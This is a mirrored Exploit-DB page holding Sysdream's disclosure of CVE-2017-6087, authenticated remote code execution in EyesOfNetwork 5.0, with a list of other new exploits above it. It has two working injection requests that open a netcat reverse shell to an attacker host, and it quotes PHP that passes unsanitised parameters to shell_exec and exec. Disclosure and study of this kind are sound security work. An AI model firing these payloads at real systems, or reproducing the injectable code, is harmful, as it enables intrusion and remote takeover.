bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41746.txt
Offensive Security 1f8c35c0c0 DB: 2017-03-28 
25 new exploits

Samba < 3.6.2 (x86) - Denial of Serviec (PoC)
Samba < 3.6.2 (x86) - Denial of Service (PoC)
Microsoft Visual Studio 2015 update 3 - Denial of Service
Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow
Apple Safari - 'DateTimeFormat.format' Type Confusion
Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode
Apple Safari - Out-of-Bounds Read when Calling Bound Function

QNAP QTS < 4.2.4 - Domain Privilege Escalation
Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow
Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory
Github Enterprise - Default Session Secret And Deserialization (Metasploit)

B2B Alibaba Clone Script - SQL Injection
B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection
Just Another Video Script 1.4.3 - SQL Injection
Adult Tube Video Script - SQL Injection
Alibaba Clone Script - SQL Injection
B2B Marketplace Script 2.0 - SQL Injection
Php Real Estate Property Script - SQL Injection
Courier Tracking Software 6.0 - SQL Injection
Parcel Delivery Booking Script 1.0 - SQL Injection
Delux Same Day Delivery Script 1.0 - SQL Injection
Hotel Booking Script 1.0 - SQL Injection
Tour Package Booking 1.0 - SQL Injection
Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection
CouponPHP CMS 3.1 - 'code' Parameter SQL Injection
EyesOfNetwork (EON) 5.0 - Remote Code Execution
EyesOfNetwork (EON) 5.0 - SQL Injection
Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit)
inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation
2017-03-28 05:01:16 +00:00

132 lines
No EOL
3.3 KiB
Text
Executable file
Raw Blame History

# [CVE-2017-6087] EON 5.0 Remote Code Execution
## Description
EyesOfNetwork ("EON") is an OpenSource network monitoring solution.
## Remote Code Execution (authenticated)
The Eonweb code does not correctly filter arguments, allowing
authenticated users to execute arbitrary code.
**CVE ID**: CVE-2017-6087
**Access Vector**: remote
**Security Risk**: high
**Vulnerability**: CWE-78
**CVSS Base Score**: 7.6
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L
### Proof of Concept 1
On the attacker's host, we start a handler:
```
nc -lvp 1337
```
The `selected_events` parameter is not correctly filtered before it is
used by the `shell_exec()` function.
There, it is possible to inject a payload like in the request below,
where we connect back to our handler:
```
https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
```
#### Vulnerable code
The payload gets injected into the `$event[$key]` and `$ged_command`
variables of the `module/monitoring_ged/ged_functions.php` file, line 373:
```
$ged_command = "-update -type $ged_type_nbr ";
foreach ($array_ged_packets as $key => $value) {
if($value["type"] == true){
if($key == "owner"){
$event[$key] = $owner;
}
$ged_command .= "\"".$event[$key]."\" ";
}
}
$ged_command = trim($ged_command, " ");
shell_exec($path_ged_bin." ".$ged_command);
```
Two other functions in this file are also affected by this problem:
* `delete($selected_events, $queue);`
* `ownDisown($selected_events, $queue, $global_action);`
### Proof of Concept 2
On the attacker's host, we start a handler:
```
nc -lvp 1337
```
The `module` parameter is not correctly filtered before it is used by
the `shell_exec()` function.
Again, we inject our connecting back payload:
```
https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
```
#### Vulnerable code
In the `module/index.php` file, line 24, we can see that our payload is
injected into the `exec()` function without any sanitization:
```
# Check optionnal module to load
if(isset($_GET["module"]) && isset($_GET["link"])) {
$module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");
# Redirect to module page if rpm installed
if($module!=0) { header('Location: '.$_GET["link"].''); }
}
```
## Timeline (dd/mm/yyyy)
* 01/10/2016 : Initial discovery.
* 09/10/2016 : Fisrt contact with vendor.
* 23/10/2016 : Technical details sent to the security contact.
* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
* 11/10/2016 : Testing the patch revealed that it needed more work.
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
repsonsible disclosure agreement.
* 14/03/2017 : Public disclosure.
Thank you to EON for the fast response.
## Solution
Update to version 5.1
## Affected versions
* Version <= 5.0
## Credits
* Nicolas SERRA <n.serra@sysdream.com>
-- SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/ *
Twitter: @sysdream
Reference in a new issue View git blame Copy permalink